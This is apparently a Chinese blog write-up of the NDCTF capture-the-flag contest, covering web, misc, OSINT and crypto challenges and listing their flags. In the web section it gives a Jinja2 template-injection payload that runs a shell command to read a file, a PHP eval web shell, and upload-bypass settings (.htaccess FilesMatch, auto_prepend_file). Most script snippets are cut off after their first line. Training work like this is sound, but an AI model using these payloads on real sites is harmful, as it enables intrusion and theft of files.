NDCTF-WP
WEB
ezpython
源码找到路由/s3c0nd
,进去发现需要fuzz
,(直接盲猜114514
结果对了),再进去是个ssti
,直接打就行
GET:name={{lipsum.__globals__['os'].popen('cat /flag').read()}} |
ctfplus{6b0f159b-165b-4d18-86ae-5a49709ea088}
1ezbypass
|
1ezupload
检测了<?
,@
<script language='php'>eval($_POST[123]);</script> |
<FilesMatch "1.phtml"> |
auto_prepend_file = 1.jpg |
1Pickle♥dill
% import io |
MISC
签到
先base64
解码,然后去查这个域名的txt
记录
dig TXT ctf.ctf.vin |
flag{W3lc0m3_T0_NETDREAMCTF!!!!!}
ezimg
发现图片文件最后有一串base64编码,解码得到一个腾讯文档地址https://docs.qq.com/doc/DZWxobHhmRW9pd09k
,上面写flag不在这里,但是刷新页面可以看到在图片加载之前图片下方有一串编码,在页面中全选复制粘贴可以得到以下东西
并非flag |
解码得到https://wwgn.lanzoul.com/i3q4y30huefa
,下载源码让ai写个解密脚本得到flag
from cryptography.fernet import Fernet |
flag{Hu@ngD0w_L0v3s_M1sc_F0r3v3r!!!!!}
I_AM_K
import base64 |
flag{I_am_K_hypocritical_K}
OSINT
Bridge
谷歌识图发现和重庆万州的桥相似
去搜一下发现是牌楼长江大桥
flag{牌楼长江大桥}
Where_am_i
这个谷歌直接出
flag{渥太华医院}
PWN
1ezpwn
CRYPTO
EzRSA
ai一把梭
import gmpy2 |
flag{EZ_3Z++==+__U_C@n_F1n1sh_1t}
Quaternion_Lock
同样ai一把梭
import itertools |
flag{0k@y_U_C@n_F1n1sh_iT!!!}
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing!